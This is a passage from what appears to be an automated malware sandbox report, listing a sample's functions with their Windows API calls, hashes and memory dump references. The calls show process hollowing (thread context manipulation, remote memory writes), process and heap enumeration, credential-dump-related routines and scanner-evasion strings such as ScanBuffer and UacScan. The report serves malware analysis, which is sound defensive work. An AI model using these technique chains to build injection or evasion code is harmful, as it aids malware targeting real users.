                                                                                                                        • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                        • Instruction Fuzzy Hash: A8C08CF22126020A2EA2A5FCDCC421942C98986234B601E61E438EA3C1D31EDC222834
                                                                                                                        Function 02D37E5C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,?,02D5041F,ScanString,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,ScanString,02DB7380,02D5B7B8,UacScan,02DB7380,02D5B7B8,UacInitialize), ref: 02D37E67
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                        • Instruction ID: 3061cccb1a0128f0bfe6e949ef3977fbd299fa9938561f06ccb5f2fb6c970213
                                                                                                                        • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                        • Instruction Fuzzy Hash: F7C08CE02026411A6A9265BCACC424952CA89052387640A61A438E63E2D326DCA26834
                                                                                                                        Function 02D5C35C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • timeSetEvent.WINMM(00002710,00000000,02D5C350,00000000,00000001), ref: 02D5C36C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Eventtime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2982266575-0
                                                                                                                        • Opcode ID: ec8b3698af4a25f74c2a59df34edd52226f3ad63a3b49502f77f7bd3c46cb3a7
                                                                                                                        • Instruction ID: 50d26258122ef207ee38267cfe98707a746bc0eb727f130e3e66b2f127c2e4b4
                                                                                                                        • Opcode Fuzzy Hash: ec8b3698af4a25f74c2a59df34edd52226f3ad63a3b49502f77f7bd3c46cb3a7
                                                                                                                        • Instruction Fuzzy Hash: DDC048B17A03002AFA119AAAAC82F22169DD305B10F500456BA44AA3C1D2E26C508E68
                                                                                                                        Function 02D34C38 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02D34C3F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2525500382-0
                                                                                                                        • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                        • Instruction ID: f4183d13c45d01835f7c3d8e6bb3fbd0898b34dd341665c365febc80211ec09a
                                                                                                                        • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                                                                        • Instruction Fuzzy Hash: 18B0123820820215FA1B2662EF01733004C5B4038AF8400719F98C83D0FF0CCC01C835
                                                                                                                        Function 02D34C50 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 02D34C57
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3341692771-0
                                                                                                                        • Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                        • Instruction ID: 0dbd26e6d78077c3887535f41ca6cbd0893b542967d6a4ce8dbc3cab339de9d3
                                                                                                                        • Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                        • Instruction Fuzzy Hash: 66A022AC0003030A8F0B332EC02002F2233BFC0300BC8C0E802000A2008F3ECC00EC30
                                                                                                                        Function 02D315CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02D31A03,?,02D32000), ref: 02D315E2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        • Opcode ID: 9956f615ec6b468bf9131876fcb9ce67db2e8dfec302c6f891dece17c11eedb6
                                                                                                                        • Instruction ID: dcfa7e3b8c304b0841179693377f53ffe20c37a9e64109e50d1ad41958970964
                                                                                                                        • Opcode Fuzzy Hash: 9956f615ec6b468bf9131876fcb9ce67db2e8dfec302c6f891dece17c11eedb6
                                                                                                                        • Instruction Fuzzy Hash: A1F037F0B41300CFDB0ACFB999643016BE2E78A344F10857DD609DB799E7718801CB90
                                                                                                                        Function 02D31682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02D32000), ref: 02D316A4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        • Opcode ID: 138563daae350b6005ac0bf84af5997e645487dc1eab088522b255a16c8d29e7
                                                                                                                        • Instruction ID: 4d8f8896d88419cb3de7f5a20a044cdca9b51848b02166908c9c830edc96d8e9
                                                                                                                        • Opcode Fuzzy Hash: 138563daae350b6005ac0bf84af5997e645487dc1eab088522b255a16c8d29e7
                                                                                                                        • Instruction Fuzzy Hash: BBF090B2A41695ABD7129E5ADC90782BB98FB00314F054139F90897B40D770EC108BD4
                                                                                                                        Function 02D316E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02D31704
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1263568516-0
                                                                                                                        • Opcode ID: 4a9cb7a300d17af57070c298d4b7dc3bbc0bbb1b8cf8bae55d61bc2c912f28ea
                                                                                                                        • Instruction ID: ec3f00e8b917c7beea2f21a50c9dca72102a3ce24cc53d3333364a616cc99579
                                                                                                                        • Opcode Fuzzy Hash: 4a9cb7a300d17af57070c298d4b7dc3bbc0bbb1b8cf8bae55d61bc2c912f28ea
                                                                                                                        • Instruction Fuzzy Hash: A2E086B5300312EFD7115A799D407126BDCEB44654F184475F549DB341D6A0EC10CB70

                                                                                                                        Non-executed Functions

                                                                                                                        Function 02D4AB1C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02D4ADA3,?,?,02D4AE35,00000000,02D4AF11), ref: 02D4AB30
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02D4AB48
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02D4AB5A
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02D4AB6C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02D4AB7E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02D4AB90
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02D4ABA2
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02D4ABB4
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02D4ABC6
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02D4ABD8
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02D4ABEA
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02D4ABFC
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02D4AC0E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02D4AC20
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02D4AC32
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02D4AC44
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02D4AC56
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                        • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                        • API String ID: 667068680-597814768
                                                                                                                        • Opcode ID: 126516cfb07fd1bb43ee79f5e60cf8beb8e354d148de608bbf4cac96dbae183d
                                                                                                                        • Instruction ID: 8ffabe5e7b949616eac3607476c594507289cebbbf77df22501c12b41831dd18
                                                                                                                        • Opcode Fuzzy Hash: 126516cfb07fd1bb43ee79f5e60cf8beb8e354d148de608bbf4cac96dbae183d
                                                                                                                        • Instruction Fuzzy Hash: 3131CCB5A80290EFFF02EBA4E8A5A1977E9EB55741B000DA5E401DF308EB74ED14CF65
                                                                                                                        Function 02D48D70 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02D489D0: FreeLibrary.KERNEL32(74FA0000,00000000,00000000,00000000,00000000,02DB738C,Function_0000662C,00000004,02DB739C,02DB738C,05F5E103,00000040,02DB73A0,74FA0000,00000000,00000000), ref: 02D48AAA
                                                                                                                          • Part of subcall function 02D48788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02D48814
                                                                                                                        • GetThreadContext.KERNEL32(00000000,02DB7424,ScanString,02DB73A8,02D4A93C,UacInitialize,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,UacInitialize,02DB73A8), ref: 02D49602
                                                                                                                          • Part of subcall function 02D47A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D47A9F
                                                                                                                          • Part of subcall function 02D47D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D47DEC
                                                                                                                        • SetThreadContext.KERNEL32(00000000,02DB7424,ScanBuffer,02DB73A8,02D4A93C,ScanString,02DB73A8,02D4A93C,Initialize,02DB73A8,02D4A93C,00000000,-00000008,02DB74FC,00000004,02DB7500), ref: 02D4A317
                                                                                                                        • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02DB7424,ScanBuffer,02DB73A8,02D4A93C,ScanString,02DB73A8,02D4A93C,Initialize,02DB73A8,02D4A93C,00000000,-00000008,02DB74FC), ref: 02D4A324
                                                                                                                          • Part of subcall function 02D4894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02DB73A8,02D4A587,ScanString,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,Initialize,02DB73A8,02D4A93C,UacScan), ref: 02D48960
                                                                                                                          • Part of subcall function 02D4894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D4897A
                                                                                                                          • Part of subcall function 02D4894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02DB73A8,02D4A587,ScanString,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,Initialize), ref: 02D489B6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryThread$ContextFreeMemoryVirtual$AddressAllocateCreateLoadProcProcessResumeUserWrite
                                                                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                        • API String ID: 2624078988-51457883
                                                                                                                        • Opcode ID: ee77f1746cbf5b353b15b39d6d99e4dc63a676b503af63a2dae5b401e0e07b9b
                                                                                                                        • Instruction ID: 9c7a37cb6e565cd48caa4e209dfd9b27c2f634151c48eea35c90db35b36d2102
                                                                                                                        • Opcode Fuzzy Hash: ee77f1746cbf5b353b15b39d6d99e4dc63a676b503af63a2dae5b401e0e07b9b
                                                                                                                        • Instruction Fuzzy Hash: 2CE22E35A415589BDB52FB64EC90BCFB3BAEF89300F5041A6E009AB314DE34AE55CF61
                                                                                                                        Function 02D48D6E Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02D489D0: FreeLibrary.KERNEL32(74FA0000,00000000,00000000,00000000,00000000,02DB738C,Function_0000662C,00000004,02DB739C,02DB738C,05F5E103,00000040,02DB73A0,74FA0000,00000000,00000000), ref: 02D48AAA
                                                                                                                          • Part of subcall function 02D48788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02D48814
                                                                                                                        • GetThreadContext.KERNEL32(00000000,02DB7424,ScanString,02DB73A8,02D4A93C,UacInitialize,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,UacInitialize,02DB73A8), ref: 02D49602
                                                                                                                          • Part of subcall function 02D47A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D47A9F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateContextCreateFreeLibraryMemoryProcessThreadUserVirtual
                                                                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                        • API String ID: 4276370345-51457883
                                                                                                                        • Opcode ID: 9d83b9276b10ccb2b4bc841b63a2248d22a966e13c28c1ed9c1fb098f6631035
                                                                                                                        • Instruction ID: 4a597db9b30d8218a89863bbfd9e5993f6e25ffc0b6e531dfe745e2dbb6b3d20
                                                                                                                        • Opcode Fuzzy Hash: 9d83b9276b10ccb2b4bc841b63a2248d22a966e13c28c1ed9c1fb098f6631035
                                                                                                                        • Instruction Fuzzy Hash: C8E22F35A415589BDB12FB64EC90BCFB3BAEF89300F5041A6E049AB314DE34AE55CF61
                                                                                                                        Function 02D35908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,02D3737C,02D30000,02D5E790), ref: 02D35925
                                                                                                                        • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02D3593C
                                                                                                                        • lstrcpynA.KERNEL32(?,?,?), ref: 02D3596C
                                                                                                                        • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02D3737C,02D30000,02D5E790), ref: 02D359D0
                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02D3737C,02D30000,02D5E790), ref: 02D35A06
                                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02D3737C,02D30000,02D5E790), ref: 02D35A19
                                                                                                                        • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02D3737C,02D30000,02D5E790), ref: 02D35A2B
                                                                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02D3737C,02D30000,02D5E790), ref: 02D35A37
                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02D3737C,02D30000), ref: 02D35A6B
                                                                                                                        • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02D3737C), ref: 02D35A77
                                                                                                                        • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02D35A99
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                        • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                        • API String ID: 3245196872-1565342463
                                                                                                                        • Opcode ID: 1d9c244a4fdac334c44ecb9d9f9b41949a716c92c01b26bad1483609baf7bd6d
                                                                                                                        • Instruction ID: 7ff60fdceeb6618fd90ac1db06b4aef8081b15994eb9d4dd2140a3101116db2c
                                                                                                                        • Opcode Fuzzy Hash: 1d9c244a4fdac334c44ecb9d9f9b41949a716c92c01b26bad1483609baf7bd6d
                                                                                                                        • Instruction Fuzzy Hash: 1E416D71D0021AABDB12DAE8DC88ADEB7BDEB09340F4445A5E548E7341E770EE44CFA0
                                                                                                                        Function 02D35BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
